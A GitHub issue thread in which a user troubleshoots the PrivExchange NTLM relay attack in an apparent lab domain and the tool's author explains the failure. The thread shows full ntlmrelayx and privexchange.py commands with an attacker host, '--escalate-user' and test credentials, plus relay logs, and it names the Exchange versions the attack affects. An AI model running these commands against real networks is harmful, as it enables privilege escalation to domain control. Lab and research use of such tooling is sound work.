### ISSUE TITLE
Failed on Windows

### ISSUE THREAD

**Issue by xiaoyiddos** [dirkjanm/PrivExchange#5]
I run it on Windows, and I added argument with '--smb-port 2019' and then use 'netsh interface portproxy add v4tov4 listenport=445 listenaddress=192.168.101.108 connectport=2019 connectaddress=192.168.101.108' to redirect port 445.But I got this error message.

`C:\Users\Administrator\Desktop\impacket-master\impacket-master\examples>ntlmrela
yx.py -t ldap://win-7se28dskt0r.test.com --escalate-user test001 --smb-port 2
019
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[] Protocol Client HTTPS loaded..
[] Protocol Client HTTP loaded..
[] Protocol Client IMAPS loaded..
[] Protocol Client IMAP loaded..
[] Protocol Client LDAPS loaded..
[] Protocol Client LDAP loaded..
[] Protocol Client MSSQL loaded..
[] Protocol Client SMB loaded..
[] Protocol Client SMTP loaded..
[] Running in relay mode to single host
[] Setting up SMB Server
[] Setting up HTTP Server

[] Servers started, waiting for connections
[] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win
-7se28dskt0r.test.com
[] HTTPD: Client requested path: /privexchange/
[] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win
-7se28dskt0r.test.com
[] HTTPD: Client requested path: /privexchange/
[!] The client requested signing. Relaying to LDAP will not work! (This usually
happens when relaying from SMB to LDAP)
[] HTTPD: Client requested path: /privexchange/
[-] Authenticating against ldap://win-7se28dskt0r.test.com as \ FAILED
[*] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win
-7se28dskt0r.test.com`

**Comment by dirkjanm** [comment]
The issue is most likely on this line: 
> `[!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)`

Exchange 2010 enforces signing for NTLM over HTTP, which cannot be relayed. It might be that your target is running 2010.

By the way: you don't need to redirect the 445 port as this attack only needs port 80 (HTTP) to function.

**Comment by xiaoyiddos** [comment]
Sure! I installed exchange 2010 SP2 , so which version of exchange can be attacked by this?

**Comment by dirkjanm** [comment]
It's confirmed against 2013, 2016 and 2019, see the section "The tools / affected versions" [here](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/)

**Comment by xiaoyiddos** [comment]
Ok,thanks a lot!

**Comment by xiaoyiddos** [comment]
By the way , it will not enforce signing for NTLM over HTTP from 2013-2019  right?only on 2010 it does.

**Comment by xiaoyiddos** [comment]
Hi,Today I run privexchange.py on centos7 with python 2.7.5, but it noticed

[root@localhost PrivExchange]# python privexchange.py -ah 192.168.101.201 dc.test.local -ev 2013 -u test001 -p admin123
INFO: Using attacker URL: http://192.168.101.201/privexchange/
Traceback (most recent call last):
  File "privexchange.py", line 219, in <module>
    main()
  File "privexchange.py", line 124, in main
    ntlm_nego = ntlm.getNTLMSSPType1(args.attacker_host, domain=args.domain)
  File "/root/impacket/impacket/ntlm.py", line 571, in getNTLMSSPType1
    domain = domain.decode(encoding)
AttributeError: 'NoneType' object has no attribute 'decode'


I tried to add 'sys.setdefaultencoding(utf-8)' as they suggested on the Internet but it didn't work.
